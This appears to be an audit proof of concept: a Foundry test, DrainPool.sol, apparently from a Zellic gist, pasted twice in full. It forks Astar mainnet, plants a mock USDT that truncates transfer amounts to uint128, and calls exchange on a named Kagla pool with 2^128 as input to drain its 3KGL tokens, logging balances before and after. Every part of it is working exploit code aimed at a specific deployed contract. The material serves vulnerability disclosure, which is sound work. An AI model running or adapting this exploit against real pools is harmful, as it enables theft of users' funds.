zellic-audit/DrainPool.sol Secret

## DrainPool.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity >0.8.20;
pragma experimental ABIEncoderV2;

import {Test} from "forge-std/Test.sol";
import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

import "forge-std/console.sol";

interface IIPool {
    function coins(uint) external view returns (address);

    function exchange(
        int128 i,
        int128 j,
        uint256 dx,
        uint256 min_dy
    ) external returns (uint256);
}

contract USDT is ERC20 {
    constructor() ERC20("Tether USD", "USDT") {}

    function decimals() public pure override returns (uint8) {
        return 6;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        uint128 a = uint128(amount);
        return super.transferFrom(sender, recipient, uint256(a));
    }

    function transfer(
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        uint128 a = uint128(amount);
        return super.transfer(recipient, uint256(a));
    }

    function mint(address recipient, uint256 amount) public {
        _mint(recipient, amount);
    }
}

contract DrainPool is Test {
    USDT usdt;
    IIPool kaglaPool = IIPool(0xDc1C5bAbB4dad3117Fd46d542f3b356D171417fA);

    function setUp() public {
        vm.createSelectFork(
            "https://astar-mainnet.g.alchemy.com/v2/xxxxxxxx",
            4822542
        );

        deployCodeTo(
            "DrainPool.t.sol:USDT",
            "",
            address(0xfFFfffFF000000000000000000000001000007C0)
        );
        usdt = USDT(0xfFFfffFF000000000000000000000001000007C0);
        usdt.mint(address(kaglaPool), 267994933776);
    }

    function testDrainKagla() public {
        ERC20 kgl3 = ERC20(kaglaPool.coins(1));

        console.log("Draining the Kagla USDT-3KGL pool");
        console.log("pool.coins(0): %s", kaglaPool.coins(0));
        console.log("pool.coins(1): %s", kaglaPool.coins(1));

        console.log(
            "usdt.balanceOf(address(pool)) : %s",
            usdt.balanceOf(address(kaglaPool))
        );
        console.log(
            "3kgl.balanceOf(address(pool)): %s",
            kgl3.balanceOf(address(kaglaPool))
        );
        console.log(
            "3kgl.balanceOf(address(this)): %s",
            kgl3.balanceOf(address(this))
        );

        console.log("Draining pool now...");

        // def exchange(i: int128, j: int128, dx: uint256, min_dy: uint256)
        uint256 truncatedAmount = uint256(type(uint128).max) + 1;
        kaglaPool.exchange(0, 1, truncatedAmount, 0);

        console.log(
            "usdt.balanceOf(address(pool)) : %s",
            usdt.balanceOf(address(kaglaPool))
        );
        console.log(
            "kgl3.balanceOf(address(pool)): %s",
            kgl3.balanceOf(address(kaglaPool))
        );
        console.log(
            "3kgl.balanceOf(address(this)): %s",
            kgl3.balanceOf(address(this))
        );
    }
}
	// SPDX-License-Identifier: UNLICENSED
	pragma solidity >0.8.20;
	pragma experimental ABIEncoderV2;

	import {Test} from "forge-std/Test.sol";
	import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

	import "forge-std/console.sol";

	interface IIPool {
	function coins(uint) external view returns (address);

	function exchange(
	int128 i,
	int128 j,
	uint256 dx,
	uint256 min_dy
	) external returns (uint256);
	}

	contract USDT is ERC20 {
	constructor() ERC20("Tether USD", "USDT") {}

	function decimals() public pure override returns (uint8) {
	return 6;
	}

	function transferFrom(
	address sender,
	address recipient,
	uint256 amount
	) public override returns (bool) {
	uint128 a = uint128(amount);
	return super.transferFrom(sender, recipient, uint256(a));
	}

	function transfer(
	address recipient,
	uint256 amount
	) public override returns (bool) {
	uint128 a = uint128(amount);
	return super.transfer(recipient, uint256(a));
	}

	function mint(address recipient, uint256 amount) public {
	_mint(recipient, amount);
	}
	}

	contract DrainPool is Test {
	USDT usdt;
	IIPool kaglaPool = IIPool(0xDc1C5bAbB4dad3117Fd46d542f3b356D171417fA);

	function setUp() public {
	vm.createSelectFork(
	"https://astar-mainnet.g.alchemy.com/v2/xxxxxxxx",
	4822542
	);

	deployCodeTo(
	"DrainPool.t.sol:USDT",
	"",
	address(0xfFFfffFF000000000000000000000001000007C0)
	);
	usdt = USDT(0xfFFfffFF000000000000000000000001000007C0);
	usdt.mint(address(kaglaPool), 267994933776);
	}

	function testDrainKagla() public {
	ERC20 kgl3 = ERC20(kaglaPool.coins(1));

	console.log("Draining the Kagla USDT-3KGL pool");
	console.log("pool.coins(0): %s", kaglaPool.coins(0));
	console.log("pool.coins(1): %s", kaglaPool.coins(1));

	console.log(
	"usdt.balanceOf(address(pool)) : %s",
	usdt.balanceOf(address(kaglaPool))
	);
	console.log(
	"3kgl.balanceOf(address(pool)): %s",
	kgl3.balanceOf(address(kaglaPool))
	);
	console.log(
	"3kgl.balanceOf(address(this)): %s",
	kgl3.balanceOf(address(this))
	);

	console.log("Draining pool now...");

	// def exchange(i: int128, j: int128, dx: uint256, min_dy: uint256)
	uint256 truncatedAmount = uint256(type(uint128).max) + 1;
	kaglaPool.exchange(0, 1, truncatedAmount, 0);

	console.log(
	"usdt.balanceOf(address(pool)) : %s",
	usdt.balanceOf(address(kaglaPool))
	);
	console.log(
	"kgl3.balanceOf(address(pool)): %s",
	kgl3.balanceOf(address(kaglaPool))
	);
	console.log(
	"3kgl.balanceOf(address(this)): %s",
	kgl3.balanceOf(address(this))
	);
	}
	}